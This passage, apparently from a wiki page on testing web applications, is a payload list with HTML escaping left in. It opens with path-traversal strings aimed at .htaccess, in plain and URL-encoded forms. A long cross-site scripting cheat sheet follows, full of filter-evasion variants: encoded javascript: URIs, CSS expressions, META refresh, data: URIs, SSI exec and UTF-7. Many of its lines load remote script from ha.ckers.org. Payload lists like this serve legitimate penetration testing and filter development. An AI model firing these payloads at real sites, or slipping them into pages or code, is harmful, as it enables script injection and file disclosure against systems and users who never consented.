../../.htaccess&lt;br /&gt;
../.htaccess&lt;br /&gt;
.htaccess&lt;br /&gt;
././.htaccess&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
''Sorry for breaking the layout - but &amp;quot;breaking the layout&amp;quot; could become &amp;quot;breaking the software&amp;quot;.''&lt;br /&gt;
&lt;br /&gt;
=== XSS Statements - Most effective/most common statements ===&lt;br /&gt;
&lt;br /&gt;
Testing Statements&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//&amp;quot;;alert(String.fromCharCode(88,83,83))//\&amp;quot;;alert(String.fromCharCode(88,83,83))//--&amp;gt;&amp;lt;/SCRIPT&amp;gt;&amp;quot;&amp;gt;'&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(String.fromCharCode(88,83,83))&amp;lt;/SCRIPT&amp;gt; &lt;br /&gt;
'';!--&amp;quot;&amp;lt;XSS&amp;gt;=&amp;amp;{()}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Common exploit code (covers a lot of XSS vulnerabilities)&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
'&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(String.fromCharCode(88,83,83))&amp;lt;/SCRIPT&amp;gt;&amp;lt;img src=&amp;quot;&amp;quot; alt='&lt;br /&gt;
&amp;quot;&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(String.fromCharCode(88,83,83))&amp;lt;/SCRIPT&amp;gt;&amp;lt;img src=&amp;quot;&amp;quot; alt=&amp;quot;&lt;br /&gt;
\'&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(String.fromCharCode(88,83,83))&amp;lt;/SCRIPT&amp;gt;&amp;lt;img src=&amp;quot;&amp;quot; alt=\'&lt;br /&gt;
'); alert('xss'); var x='&lt;br /&gt;
\\'); alert(\'xss\');var x=\'&lt;br /&gt;
//--&amp;gt;&amp;lt;/SCRIPT&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(String.fromCharCode(88,83,83));&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== XSS Statements - Full List ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=&amp;quot;javascript:alert('XSS');&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=javascript:alert('XSS')&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=javascript:alert(&amp;amp;quot;XSS&amp;amp;quot;)&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=`javascript:alert(&amp;quot;RSnake says, 'XSS'&amp;quot;)`&amp;gt;&lt;br /&gt;
&amp;lt;IMG &amp;quot;&amp;quot;&amp;quot;&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(&amp;quot;XSS&amp;quot;)&amp;lt;/SCRIPT&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=&amp;amp;#106;&amp;amp;#97;&amp;amp;#118;&amp;amp;#97;&amp;amp;#115;&amp;amp;#99;&amp;amp;#114;&amp;amp;#105;&amp;amp;#112;&amp;amp;#116;&amp;amp;#58;&amp;amp;#97;&amp;amp;#108;&amp;amp;#101;&amp;amp;#114;&amp;amp;#116;&amp;amp;#40;&amp;amp;#39;&amp;amp;#88;&amp;amp;#83;&amp;amp;#83;&amp;amp;#39;&amp;amp;#41;&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=&amp;amp;#0000106&amp;amp;#0000097&amp;amp;#0000118&amp;amp;#0000097&amp;amp;#0000115&amp;amp;#0000099&amp;amp;#0000114&amp;amp;#0000105&amp;amp;#0000112&amp;amp;#0000116&amp;amp;#0000058&amp;amp;#0000097&amp;amp;#0000108&amp;amp;#0000101&amp;amp;#0000114&amp;amp;#0000116&amp;amp;#0000040&amp;amp;#0000039&amp;amp;#0000088&amp;amp;#0000083&amp;amp;#0000083&amp;amp;#0000039&amp;amp;#0000041&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=&amp;amp;#x6A&amp;amp;#x61&amp;amp;#x76&amp;amp;#x61&amp;amp;#x73&amp;amp;#x63&amp;amp;#x72&amp;amp;#x69&amp;amp;#x70&amp;amp;#x74&amp;amp;#x3A&amp;amp;#x61&amp;amp;#x6C&amp;amp;#x65&amp;amp;#x72&amp;amp;#x74&amp;amp;#x28&amp;amp;#x27&amp;amp;#x58&amp;amp;#x53&amp;amp;#x53&amp;amp;#x27&amp;amp;#x29&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=&amp;quot;jav	ascript:alert('XSS');&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;#x09;ascript:alert('XSS');&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;#x0A;ascript:alert('XSS');&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;#x0D;ascript:alert('XSS');&amp;quot;&amp;gt;&lt;br /&gt;
perl -e 'print &amp;quot;&amp;lt;IMG SRC=java\0script:alert(\&amp;quot;XSS\&amp;quot;)&amp;gt;&amp;quot;;' &amp;gt; out&lt;br /&gt;
perl -e 'print &amp;quot;&amp;lt;SCR\0IPT&amp;gt;alert(\&amp;quot;XSS\&amp;quot;)&amp;lt;/SCR\0IPT&amp;gt;&amp;quot;;' &amp;gt; out&lt;br /&gt;
&amp;lt;IMG SRC=&amp;quot; &amp;amp;#14;  javascript:alert('XSS');&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT/XSS SRC=&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;BODY onload!#$%&amp;amp;()*~+-_.,:;?@[/|\]^`=alert(&amp;quot;XSS&amp;quot;)&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT/SRC=&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;&amp;lt;SCRIPT&amp;gt;alert(&amp;quot;XSS&amp;quot;);//&amp;lt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&amp;lt;B&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT SRC=//ha.ckers.org/.j&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=&amp;quot;javascript:alert('XSS')&amp;quot;&lt;br /&gt;
&amp;lt;iframe src=http://ha.ckers.org/scriptlet.html &amp;lt;&lt;br /&gt;
&amp;lt;SCRIPT&amp;gt;a=/XSS/\nalert(a.source)&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
\&amp;quot;;alert('XSS');//&lt;br /&gt;
&amp;lt;/TITLE&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(&amp;quot;XSS&amp;quot;);&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;INPUT TYPE=&amp;quot;IMAGE&amp;quot; SRC=&amp;quot;javascript:alert('XSS');&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;BODY BACKGROUND=&amp;quot;javascript:alert('XSS')&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;BODY ONLOAD=alert('XSS')&amp;gt;&lt;br /&gt;
&amp;lt;IMG DYNSRC=&amp;quot;javascript:alert('XSS')&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;IMG LOWSRC=&amp;quot;javascript:alert('XSS')&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;BGSOUND SRC=&amp;quot;javascript:alert('XSS');&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;BR SIZE=&amp;quot;&amp;amp;{alert('XSS')}&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;LAYER SRC=&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;gt;&amp;lt;/LAYER&amp;gt;&lt;br /&gt;
&amp;lt;LINK REL=&amp;quot;stylesheet&amp;quot; HREF=&amp;quot;javascript:alert('XSS');&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;LINK REL=&amp;quot;stylesheet&amp;quot; HREF=&amp;quot;http://ha.ckers.org/xss.css&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;STYLE&amp;gt;@import'http://ha.ckers.org/xss.css';&amp;lt;/STYLE&amp;gt;&lt;br /&gt;
&amp;lt;META HTTP-EQUIV=&amp;quot;Link&amp;quot; Content=&amp;quot;&amp;lt;http://ha.ckers.org/xss.css&amp;gt;; REL=stylesheet&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;STYLE&amp;gt;BODY{-moz-binding:url(&amp;quot;http://ha.ckers.org/xssmoz.xml#xss&amp;quot;)}&amp;lt;/STYLE&amp;gt;&lt;br /&gt;
&amp;lt;XSS STYLE=&amp;quot;behavior: url(xss.htc);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;STYLE&amp;gt;li {list-style-image: url(&amp;quot;javascript:alert('XSS')&amp;quot;);}&amp;lt;/STYLE&amp;gt;&amp;lt;UL&amp;gt;&amp;lt;LI&amp;gt;XSS&lt;br /&gt;
&amp;lt;IMG SRC='vbscript:msgbox(&amp;quot;XSS&amp;quot;)'&amp;gt;&lt;br /&gt;
¼script¾alert(¢XSS¢)¼/script¾&lt;br /&gt;
&amp;lt;META HTTP-EQUIV=&amp;quot;refresh&amp;quot; CONTENT=&amp;quot;0;url=javascript:alert('XSS');&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;META HTTP-EQUIV=&amp;quot;refresh&amp;quot; CONTENT=&amp;quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;META HTTP-EQUIV=&amp;quot;refresh&amp;quot; CONTENT=&amp;quot;0; URL=http://;URL=javascript:alert('XSS');&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;IFRAME SRC=&amp;quot;javascript:alert('XSS');&amp;quot;&amp;gt;&amp;lt;/IFRAME&amp;gt;&lt;br /&gt;
&amp;lt;FRAMESET&amp;gt;&amp;lt;FRAME SRC=&amp;quot;javascript:alert('XSS');&amp;quot;&amp;gt;&amp;lt;/FRAMESET&amp;gt;&lt;br /&gt;
&amp;lt;TABLE BACKGROUND=&amp;quot;javascript:alert('XSS')&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;TABLE&amp;gt;&amp;lt;TD BACKGROUND=&amp;quot;javascript:alert('XSS')&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;DIV STYLE=&amp;quot;background-image: url(javascript:alert('XSS'))&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;DIV STYLE=&amp;quot;background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;DIV STYLE=&amp;quot;background-image: url(&amp;amp;#1;javascript:alert('XSS'))&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;DIV STYLE=&amp;quot;width: expression(alert('XSS'));&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;STYLE&amp;gt;@im\port'\ja\vasc\ript:alert(&amp;quot;XSS&amp;quot;)';&amp;lt;/STYLE&amp;gt;&lt;br /&gt;
&amp;lt;IMG STYLE=&amp;quot;xss:expr/*XSS*/ession(alert('XSS'))&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;XSS STYLE=&amp;quot;xss:expression(alert('XSS'))&amp;quot;&amp;gt;&lt;br /&gt;
exp/*&amp;lt;A STYLE='no\xss:noxss(&amp;quot;*//*&amp;quot;);xss:&amp;amp;#101;x&amp;amp;#x2F;*XSS*//*/*/pression(alert(&amp;quot;XSS&amp;quot;))'&amp;gt;&lt;br /&gt;
&amp;lt;STYLE TYPE=&amp;quot;text/javascript&amp;quot;&amp;gt;alert('XSS');&amp;lt;/STYLE&amp;gt;&lt;br /&gt;
&amp;lt;STYLE&amp;gt;.XSS{background-image:url(&amp;quot;javascript:alert('XSS')&amp;quot;);}&amp;lt;/STYLE&amp;gt;&amp;lt;A CLASS=XSS&amp;gt;&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;STYLE type=&amp;quot;text/css&amp;quot;&amp;gt;BODY{background:url(&amp;quot;javascript:alert('XSS')&amp;quot;)}&amp;lt;/STYLE&amp;gt;&lt;br /&gt;
&amp;lt;!--[if gte IE 4]&amp;gt;&amp;lt;SCRIPT&amp;gt;alert('XSS');&amp;lt;/SCRIPT&amp;gt;&amp;lt;![endif]--&amp;gt;&lt;br /&gt;
&amp;lt;BASE HREF=&amp;quot;javascript:alert('XSS');//&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;OBJECT TYPE=&amp;quot;text/x-scriptlet&amp;quot; DATA=&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;gt;&amp;lt;/OBJECT&amp;gt;&lt;br /&gt;
&amp;lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&amp;gt;&amp;lt;param name=url value=javascript:alert('XSS')&amp;gt;&amp;lt;/OBJECT&amp;gt;&lt;br /&gt;
&amp;lt;EMBED SRC=&amp;quot;http://ha.ckers.org/xss.swf&amp;quot; AllowScriptAccess=&amp;quot;always&amp;quot;&amp;gt;&amp;lt;/EMBED&amp;gt;&lt;br /&gt;
&amp;lt;EMBED SRC=&amp;quot;data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==&amp;quot; type=&amp;quot;image/svg+xml&amp;quot; AllowScriptAccess=&amp;quot;always&amp;quot;&amp;gt;&amp;lt;/EMBED&amp;gt;&lt;br /&gt;
&amp;lt;HTML xmlns:xss&amp;gt;&amp;lt;?import namespace=&amp;quot;xss&amp;quot; implementation=&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;gt;&amp;lt;xss:xss&amp;gt;XSS&amp;lt;/xss:xss&amp;gt;&amp;lt;/HTML&amp;gt;&lt;br /&gt;
&amp;lt;XML ID=I&amp;gt;&amp;lt;X&amp;gt;&amp;lt;C&amp;gt;&amp;lt;![CDATA[&amp;lt;IMG SRC=&amp;quot;javas]]&amp;gt;&amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;gt;]]&amp;gt;&amp;lt;/C&amp;gt;&amp;lt;/X&amp;gt;&amp;lt;/xml&amp;gt;&amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;gt;&amp;lt;/SPAN&amp;gt;&lt;br /&gt;
&amp;lt;XML ID=&amp;quot;xss&amp;quot;&amp;gt;&amp;lt;I&amp;gt;&amp;lt;B&amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;javas&amp;lt;!-- --&amp;gt;cript:alert('XSS')&amp;quot;&amp;amp;gt;&amp;lt;/B&amp;gt;&amp;lt;/I&amp;gt;&amp;lt;/XML&amp;gt;&amp;lt;SPAN DATASRC=&amp;quot;#xss&amp;quot; DATAFLD=&amp;quot;B&amp;quot; DATAFORMATAS=&amp;quot;HTML&amp;quot;&amp;gt;&amp;lt;/SPAN&amp;gt;&lt;br /&gt;
&amp;lt;XML SRC=&amp;quot;xsstest.xml&amp;quot; ID=I&amp;gt;&amp;lt;/XML&amp;gt;&amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;gt;&amp;lt;/SPAN&amp;gt;&lt;br /&gt;
&amp;lt;HTML&amp;gt;&amp;lt;BODY&amp;gt;&amp;lt;?xml:namespace prefix=&amp;quot;t&amp;quot; ns=&amp;quot;urn:schemas-microsoft-com:time&amp;quot;&amp;gt;&amp;lt;?import namespace=&amp;quot;t&amp;quot; implementation=&amp;quot;#default#time2&amp;quot;&amp;gt;&amp;lt;t:set attributeName=&amp;quot;innerHTML&amp;quot; to=&amp;quot;XSS&amp;amp;lt;SCRIPT DEFER&amp;amp;gt;alert(&amp;amp;quot;XSS&amp;amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;gt;&amp;lt;/BODY&amp;gt;&amp;lt;/HTML&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT SRC=&amp;quot;http://ha.ckers.org/xss.jpg&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;!--#exec cmd=&amp;quot;/bin/echo '&amp;lt;SCR'&amp;quot;--&amp;gt;&amp;lt;!--#exec cmd=&amp;quot;/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&amp;gt;&amp;lt;/SCRIPT&amp;gt;'&amp;quot;--&amp;gt;&lt;br /&gt;
&amp;lt;? echo('&amp;lt;SCR)';echo('IPT&amp;gt;alert(&amp;quot;XSS&amp;quot;)&amp;lt;/SCRIPT&amp;gt;'); ?&amp;gt;&lt;br /&gt;
&amp;lt;META HTTP-EQUIV=&amp;quot;Set-Cookie&amp;quot; Content=&amp;quot;USERID=&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS')&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;HEAD&amp;gt;&amp;lt;META HTTP-EQUIV=&amp;quot;CONTENT-TYPE&amp;quot; CONTENT=&amp;quot;text/html; charset=UTF-7&amp;quot;&amp;gt; &amp;lt;/HEAD&amp;gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-&lt;br /&gt;
&amp;lt;SCRIPT a=&amp;quot;&amp;gt;&amp;quot; SRC=&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT =&amp;quot;&amp;gt;&amp;quot; SRC=&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT a=&amp;quot;&amp;gt;&amp;quot; '' SRC=&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT &amp;quot;a='&amp;gt;'&amp;quot; SRC=&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT a=`&amp;gt;` SRC=&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT a=&amp;quot;&amp;gt;'&amp;gt;&amp;quot; SRC=&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT&amp;gt;document.write(&amp;quot;&amp;lt;SCRI&amp;quot;);&amp;lt;/SCRIPT&amp;gt;PT SRC=&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;http://66.102.7.147/&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;http://1113982867/&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;http://0x42.0x0000066.0x7.0x93/&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;http://0102.0146.0007.00000223/&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;h\ntt\tp://6&amp;amp;#9;6.000146.0x7.147/&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;//www.google.com/&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;//google&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;http://google.com/&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;http://www.google.com./&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;javascript:document.location='http://www.google.com/'&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;http://www.gohttp://www.google.com/ogle.com/&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;a href=&amp;quot;javas&amp;amp;#99;ript&amp;amp;#35;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;a href=&amp;quot;javas&amp;amp;#99;ript&amp;amp;#35;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;div onmouseover=&amp;quot;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;img src=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;img dynsrc=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;input type=&amp;quot;image&amp;quot; dynsrc=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;bgsound src=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;amp;&amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;amp;{document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);};&lt;br /&gt;
&amp;lt;img src=&amp;amp;{document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);};&amp;gt;&lt;br /&gt;
&amp;lt;link rel=&amp;quot;stylesheet&amp;quot; href=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;iframe src=&amp;quot;vbscript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;img src=&amp;quot;mocha:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;img src=&amp;quot;livescript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;a href=&amp;quot;about:&amp;lt;s&amp;amp;#99;ript&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;lt;/script&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;meta http-equiv=&amp;quot;refresh&amp;quot; content=&amp;quot;0;url=javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;body onload=&amp;quot;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;div style=&amp;quot;background-image: url(javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;););&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;div style=&amp;quot;behaviour: url([link to code]);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;div style=&amp;quot;binding: url([link to code]);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;div style=&amp;quot;width: expression(document.write(&amp;quot;XSS-XSS-XSS&amp;quot;););&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;style type=&amp;quot;text/javascript&amp;quot;&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;lt;/style&amp;gt;&lt;br /&gt;
&amp;lt;object classid=&amp;quot;clsid:...&amp;quot; codebase=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;style&amp;gt;&amp;lt;!--&amp;lt;/style&amp;gt;&amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);//--&amp;gt;&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;![CDATA[&amp;lt;!--]]&amp;gt;&amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);//--&amp;gt;&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;!-- -- --&amp;gt;&amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;lt;/script&amp;gt;&amp;lt;!-- -- --&amp;gt;&lt;br /&gt;
&amp;lt;&amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;img src=&amp;quot;blah&amp;quot;onmouseover=&amp;quot;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;img src=&amp;quot;blah&amp;gt;&amp;quot; onmouseover=&amp;quot;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;xml src=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;xml id=&amp;quot;X&amp;quot;&amp;gt;&amp;lt;a&amp;gt;&amp;lt;b&amp;gt;&amp;amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;amp;lt;/script&amp;gt;;&amp;lt;/b&amp;gt;&amp;lt;/a&amp;gt;&amp;lt;/xml&amp;gt;&lt;br /&gt;
&amp;lt;div datafld=&amp;quot;b&amp;quot; dataformatas=&amp;quot;html&amp;quot; datasrc=&amp;quot;#X&amp;quot;&amp;gt;&amp;lt;/div&amp;gt;&lt;br /&gt;
&amp;lt;a href=&amp;quot;javas&amp;amp;#99;ript&amp;amp;#35;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;div onmouseover=&amp;quot;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;img src=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
